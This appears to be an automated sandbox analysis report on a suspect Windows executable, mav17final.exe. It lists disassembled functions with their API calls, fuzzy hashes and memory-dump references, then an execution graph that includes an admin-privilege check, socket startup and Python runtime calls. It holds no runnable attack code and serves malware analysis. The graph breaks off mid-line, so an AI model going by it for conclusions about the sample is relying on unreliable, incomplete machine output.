                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                  • String ID:
                                                  • API String ID: 2780335769-0
                                                  • Opcode ID: 35b39605cee2f0bec39b1907a2341c6141e62181e74802fd53fc0af55d5f4a9a
                                                  • Instruction ID: d1a786517f6e61b59d4db21e81330edea95941f751ef144b7b2f734fdb2fb473
                                                  • Opcode Fuzzy Hash: 35b39605cee2f0bec39b1907a2341c6141e62181e74802fd53fc0af55d5f4a9a
                                                  • Instruction Fuzzy Hash: AF518E22E04A418AFB30EF719490BBDB3A1EB68B58F958575DE0D476A9DF38D4818370
                                                  Function 00007FF79EA42330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$DialogInvalidateRect
                                                  • String ID:
                                                  • API String ID: 1956198572-0
                                                  • Opcode ID: 222d2908f78c2ae87f40d4d29d421000ec4f5a81934d325a3cc9435ab5a32f74
                                                  • Instruction ID: 59276936feb21fbb02c66ecd09449a3bb1d9af045df756eb5cf9806d91160dcf
                                                  • Opcode Fuzzy Hash: 222d2908f78c2ae87f40d4d29d421000ec4f5a81934d325a3cc9435ab5a32f74
                                                  • Instruction Fuzzy Hash: 3411AC21E1854142F774A779F58467992A1EFC9B80FC48031DA4906BBDDE3CE4C54730
                                                  Function 00007FF79EA4F300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-3916222277
                                                  • Opcode ID: 561aa88df7fdb61349e0ce58f807f1a8352d02f5797fb50474d80bf85903fc07
                                                  • Instruction ID: 0f8cbeae50527ff90205fb5ec5fa2dc8437e7bc300a0ad1f06fd53c6659cbc1b
                                                  • Opcode Fuzzy Hash: 561aa88df7fdb61349e0ce58f807f1a8352d02f5797fb50474d80bf85903fc07
                                                  • Instruction Fuzzy Hash: 1A51647A91C60A86E774AF3880C4B7CB7A5FB15B19F943135C60A422B5EF2CE485C731
                                                  Function 00007FF79EA59DBC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: e+000$gfff
                                                  • API String ID: 3215553584-3030954782
                                                  • Opcode ID: 814d447ac16e6b6f5b3f52da07250c54334cccc87630bfda28cdf0e87c86ffba
                                                  • Instruction ID: bc685cceece1a3424a9a3caf44052dfd9322effcbb06869931d7ff423270ce0b
                                                  • Opcode Fuzzy Hash: 814d447ac16e6b6f5b3f52da07250c54334cccc87630bfda28cdf0e87c86ffba
                                                  • Instruction Fuzzy Hash: E5513862B187C146E7349F36988077DAB91E780B90F88D235DBAC4BBE6CE2CD044C720
                                                  Function 00007FF79EA550B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FileLanguagesModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                  • String ID: C:\Users\user\Desktop\mav17final.exe
                                                  • API String ID: 1726085181-2372985319
                                                  • Opcode ID: 6513ab59fd3ebffa9909c11dcfcf25d4117bd67f3801bb89ebe6b139d55717b7
                                                  • Instruction ID: 4aceeb328d5ecda240188b099ce6eaa32ca62792a0ba98fc8a1762de253b0ce8
                                                  • Opcode Fuzzy Hash: 6513ab59fd3ebffa9909c11dcfcf25d4117bd67f3801bb89ebe6b139d55717b7
                                                  • Instruction Fuzzy Hash: 29416036A18B1286EB24FF35A8C08BDB795EF44B90B954035EE4E43BA5DE3DE4418370
                                                  Function 00007FF79EA5835C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 59f2e813d905b0fd74d22bf7396b879cd5f582deb478cb9eac5e44ccbddea9db
                                                  • Instruction ID: 4ba6fb57bfe64097bce796e264f9d0bc3ebf9b267112894ac31c90114f952784
                                                  • Opcode Fuzzy Hash: 59f2e813d905b0fd74d22bf7396b879cd5f582deb478cb9eac5e44ccbddea9db
                                                  • Instruction Fuzzy Hash: DF41B462A18A8195DB30EF35E4847BEA761FB887A4F854031EE4D877A8EF3CD441C760
                                                  Function 00007FF79EA5AF3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory
                                                  • String ID: :
                                                  • API String ID: 1611563598-336475711
                                                  • Opcode ID: 1f0320950012fe8e14a23f6c4f15084a02658a02bc0f564a754340da70183b2c
                                                  • Instruction ID: e09639a5b1a26118131eae558123b44113bcb68c66c795c4ba3dc074cda0bf10
                                                  • Opcode Fuzzy Hash: 1f0320950012fe8e14a23f6c4f15084a02658a02bc0f564a754340da70183b2c
                                                  • Instruction Fuzzy Hash: 9521D262B0864581EB30AB25D08467EB3A1FBC8B44FC68035DA8E436A4DF7CE9458771
                                                  Function 00007FF79EA42B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message$ByteCharMultiWide
                                                  • String ID: Fatal error detected
                                                  • API String ID: 1878133881-4025702859
                                                  • Opcode ID: b8e8508615fbad4ea20b877775acb8155a3929f0c9030de47d537fc6cd6468c8
                                                  • Instruction ID: 822b6b1da1dac6661c43e39107413242807b1fe05de4a6acd0ad0c3a072f1ecd
                                                  • Opcode Fuzzy Hash: b8e8508615fbad4ea20b877775acb8155a3929f0c9030de47d537fc6cd6468c8
                                                  • Instruction Fuzzy Hash: 07212472628A8191EB30A721F491BFAA764FB84784FC05135EA8D47AA9DF3CD205C770
                                                  Function 00007FF79EA42C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message$ByteCharMultiWide
                                                  • String ID: Error detected
                                                  • API String ID: 1878133881-3513342764
                                                  • Opcode ID: acec89b49bf928f7a13d39fc11b0c7e0425371a071b1d5ebcc82a15e42e87902
                                                  • Instruction ID: 41e759d21684befad27608379055aa783253d805a1c5643a9863f1b40181c42e
                                                  • Opcode Fuzzy Hash: acec89b49bf928f7a13d39fc11b0c7e0425371a071b1d5ebcc82a15e42e87902
                                                  • Instruction Fuzzy Hash: 1F211772728A8191E730A721F491BFAA754FB84784FC05135EA8D47A69DF3DD205C770
                                                  Function 00007FF79EA5ABF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Stringtry_get_function
                                                  • String ID: LCMapStringEx
                                                  • API String ID: 2588686239-3893581201
                                                  • Opcode ID: 2101cb5c07a168839850d0edfb874091af6ebc80072ebc10d1abf884cbf0ab4d
                                                  • Instruction ID: 374391348acb1dda12e658550b3dcb99e694d99f908a0b3ed107087acf1cdb4c
                                                  • Opcode Fuzzy Hash: 2101cb5c07a168839850d0edfb874091af6ebc80072ebc10d1abf884cbf0ab4d
                                                  • Instruction Fuzzy Hash: 98113E32708B8186D770DB66F4806AAB7A0FBC9B80F544135EE8D43B69DF3CD5408B50
                                                  Function 00007FF79EA5A984 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CompareStringtry_get_function
                                                  • String ID: CompareStringEx
                                                  • API String ID: 3328479835-2590796910
                                                  • Opcode ID: 38a36db80e64623837e679e120ce637820d08bf828d5f076ee9ee53737858b40
                                                  • Instruction ID: d28b327ef88a016f45efe50e90e472831ed1f212b516d71cbbcebcf3adf1285a
                                                  • Opcode Fuzzy Hash: 38a36db80e64623837e679e120ce637820d08bf828d5f076ee9ee53737858b40
                                                  • Instruction Fuzzy Hash: 49114D32608B8186D770DB56F4806AAF7A0FBC9B90F544136EE8D93B69DF3CD5408B50
                                                  Function 00007FF79EA5B950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: :
                                                  • API String ID: 3215553584-336475711
                                                  • Opcode ID: 192b6cbcbdd513becbf883ef8c0b540d55c2aa4c74b0e5f7c665f18236696580
                                                  • Instruction ID: 1cf7b0b7102807eb2252e1dcb1cf6c57e60f380e22a93a0a6952a7e643123b70
                                                  • Opcode Fuzzy Hash: 192b6cbcbdd513becbf883ef8c0b540d55c2aa4c74b0e5f7c665f18236696580
                                                  • Instruction Fuzzy Hash: 7501AD6291C602C6F770BF71A4A2A7EB3A0EF98704FC01435E94E426B5DF2CE5048B34
                                                  Function 00007FF79EA5AB8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF79EA5ABBD
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF79EA56B72,?,?,?,00007FF79EA56A6A,?,?,?,00007FF79EA52342,?,?,00000000,00007FF79EA43FF9), ref: 00007FF79EA5ABD7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                  • String ID: InitializeCriticalSectionEx
                                                  • API String ID: 539475747-3084827643
                                                  • Opcode ID: 3aae4de72f8da0589877f7c5ee30f066c9cb11cf1ae4900690b26ad9603cf222
                                                  • Instruction ID: 00c380706a6630db24845782e67d61788c3d6507fd4c5ff91457b05c63b48dee
                                                  • Opcode Fuzzy Hash: 3aae4de72f8da0589877f7c5ee30f066c9cb11cf1ae4900690b26ad9603cf222
                                                  • Instruction Fuzzy Hash: E7F0B431B18B4181EB246B71B4808B9A321FF89FC0F845035EA4E07B64CE3CD945C3B0
                                                  Function 00007FF79EA5AB38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 00007FF79EA5AB61
                                                  • TlsSetValue.KERNEL32(?,?,00000000,00007FF79EA597F6,?,?,00000000,00007FF79EA51385,?,?,?,?,00007FF79EA56855), ref: 00007FF79EA5AB78
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Valuetry_get_function
                                                  • String ID: FlsSetValue
                                                  • API String ID: 738293619-3750699315
                                                  • Opcode ID: ff2a2b461866a750f2fe06eacc14e09380a1ffa156c1b8a627783b45be8ea7ab
                                                  • Instruction ID: 5f4637b7885f90e02f81c5d81b504fee2ec3636594386ac403bcaba048829177
                                                  • Opcode Fuzzy Hash: ff2a2b461866a750f2fe06eacc14e09380a1ffa156c1b8a627783b45be8ea7ab
                                                  • Instruction Fuzzy Hash: 59E06571F08A0291FA247B71F5808B9A222EF89BC0FC85035D95D062B4CE3CE985C370

                                                  Execution Graph

                                                  Execution Coverage:1.4%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:21.3%
                                                  Total number of Nodes:342
                                                  Total number of Limit Nodes:23
                                                  execution_graph 24990 7ff8bfab42b0 24993 7ff8bfab42e0 24990->24993 24994 7ff8bfab4395 24993->24994 24995 7ff8bfab4334 24993->24995 25001 7ff8bfab4730 IsUserAnAdmin 24994->25001 24995->24994 24996 7ff8bfab436b memcpy 24995->24996 24996->24995 24998 7ff8bfab4493 25003 7ff8bfab49a0 8 API calls 2 library calls 24998->25003 25000 7ff8bfab42c2 25002 7ff8bfab478c 25001->25002 25002->24998 25003->25000 25004 7ff8b93c1060 WSAStartup 25005 7ff8b93c10b0 Py_AtExit 25004->25005 25006 7ff8b93c3108 25004->25006 25008 7ff8b93c10d1 25005->25008 25009 7ff8b93c1159 PyModule_Create2 25005->25009 25007 7ff8b93c313c PyErr_SetString 25006->25007 25014 7ff8b93c311c PyErr_Format 25006->25014 25018 7ff8b93c3162 PyErr_NoMemory 25007->25018 25015 7ff8b93c10f0 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 25008->25015 25010 7ff8b93c1185 PyModule_AddObject PyErr_NewException 25009->25010 25011 7ff8b93c216b 25009->25011 25010->25011 25013 7ff8b93c11cf PyModule_AddObject PyErr_NewException 25010->25013 25041 7ff8b93c2280 8 API calls 2 library calls 25011->25041 25013->25011 25017 7ff8b93c120f PyModule_AddObject PyModule_AddObjectRef PyModule_AddObject 25013->25017 25014->25007 25015->25009 25017->25011 25020 7ff8b93c1268 PyModule_AddObject 25017->25020 25018->25011 25029 7ff8b93c3171 25018->25029 25019 7ff8b93c217d 25020->25011 25021 7ff8b93c128a PyModule_AddObject PyMem_Malloc 25020->25021 25021->25018 25023 7ff8b93c12bb PyCapsule_New 25021->25023 25022 7ff8b93c322a _Py_Dealloc 25022->25011 25024 7ff8b93c3176 25023->25024 25025 7ff8b93c130a PyModule_AddObject 25023->25025 25042 7ff8b93c4b80 _Py_Dealloc _Py_Dealloc _Py_Dealloc PyMem_Free 25024->25042 25026 7ff8b93c1325 150 API calls 25025->25026 25027 7ff8b93c318c 25025->25027 25031 7ff8b93c2037 PyLong_FromUnsignedLong 25026->25031 25027->25029 25030 7ff8b93c3191 _Py_Dealloc 25027->25030 25029->25011 25029->25022 25030->25029 25031->25011 25032 7ff8b93c2048 PyModule_AddObject 25031->25032 25032->25031 25033 7ff8b93c2066 PyModule_AddIntConstant PyModule_AddIntConstant PyModule_AddIntConstant PyModule_AddIntConstant PyModule_GetDict 25032->25033 25033->25029 25034 7ff8b93c20cd VerSetConditionMask VerSetConditionMask VerSetConditionMask 25033->25034 25035 7ff8b93c214a VerifyVersionInfoA 25034->25035 25035->25011 25036 7ff8b93c31a8 PyUnicode_FromString 25035->25036 25036->25029 25037 7ff8b93c31c8 _PyDict_Pop 25036->25037 25038 7ff8b93c31e5 _Py_Dealloc 25037->25038 25039 7ff8b93c31ee 25037->25039 25038->25039 25039->25029 25039->25035 25040 7ff8b93c31fa _Py_Dealloc 25039->25040 25040->25039 25041->25019 25043 7ff8b9f626c0 25044 7ff8b9f626e4 25043->25044 25045 7ff8b9f673ca PyTuple_GetItem 25044->25045 25046 7ff8b9f6274a 25044->25046 25048 7ff8b9f62831 25044->25048 25049 7ff8b9f6744f 25045->25049 25058 7ff8b9f673e2 PyErr_SetString 25045->25058 25113 7ff8b9f628f0 14 API calls 25046->25113 25052 7ff8b9f6285e 25048->25052 25053 7ff8b9f627b6 25048->25053 25115 7ff8b9f63d98 PyType_IsSubtype 25049->25115 25051 7ff8b9f62781 25051->25048 25051->25053 25056 7ff8b9f67448 25051->25056 25063 7ff8b9f627ad 25051->25063 25061 7ff8b9f67414 PyErr_Format 25052->25061 25062 7ff8b9f674e4 _Py_Dealloc 25052->25062 25078 7ff8b9f62980 25053->25078 25055 7ff8b9f6745e 25055->25058 25059 7ff8b9f67462 PyErr_SetString 25055->25059 25058->25056 25059->25058 25060 7ff8b9f627e8 25064 7ff8b9f627f9 25060->25064 25067 7ff8b9f67500 PyObject_CallFunctionObjArgs 25060->25067 25061->25056 25062->25061 25063->25053 25066 7ff8b9f674cf 25063->25066 25114 7ff8b9f62894 8 API calls 25064->25114 25066->25061 25075 7ff8b9f67404 _Py_Dealloc 25066->25075 25069 7ff8b9f67541 25067->25069 25070 7ff8b9f67523 25067->25070 25073 7ff8b9f67547 _Py_Dealloc 25069->25073 25074 7ff8b9f67550 25069->25074 25070->25069 25072 7ff8b9f67528 25070->25072 25071 7ff8b9f62819 25072->25064 25076 7ff8b9f67532 _Py_Dealloc 25072->25076 25073->25074 25074->25071 25077 7ff8b9f67556 _Py_Dealloc 25074->25077 25075->25061 25076->25064 25077->25071 25079 7ff8b9f6791e 25078->25079 25080 7ff8b9f629e2 25078->25080 25082 7ff8b9f67926 PyErr_Format 25079->25082 25081 7ff8b9f629ef 25080->25081 25080->25082 25084 7ff8b9f62a16 memset 25081->25084 25083 7ff8b9f6794a 25082->25083 25087 7ff8b9f6796d _Py_Dealloc 25083->25087 25084->25083 25085 7ff8b9f62a3c 25084->25085 25085->25083 25086 7ff8b9f62ad3 25085->25086 25085->25087 25089 7ff8b9f62c78 25085->25089 25090 7ff8b9f6797b 25085->25090 25091 7ff8b9f62a77 PyObject_CallOneArg 25085->25091 25140 7ff8b9f62c90 13 API calls 25085->25140 25088 7ff8b9f62bea 25086->25088 25110 7ff8b9f679f1 PyErr_NoMemory 25086->25110 25111 7ff8b9f62b84 25086->25111 25087->25090 25096 7ff8b9f679ba 25088->25096 25097 7ff8b9f62c00 25088->25097 25107 7ff8b9f62c1b 25088->25107 25143 7ff8b9f62c90 13 API calls 25089->25143 25144 7ff8b9f6d4a0 18 API calls 25090->25144 25091->25085 25091->25090 25095 7ff8b9f67997 25095->25060 25100 7ff8b9f679c1 25096->25100 25101 7ff8b9f679e3 PyLong_FromLong 25096->25101 25098 7ff8b9f679ce 25097->25098 25099 7ff8b9f62c09 25097->25099 25098->25101 25105 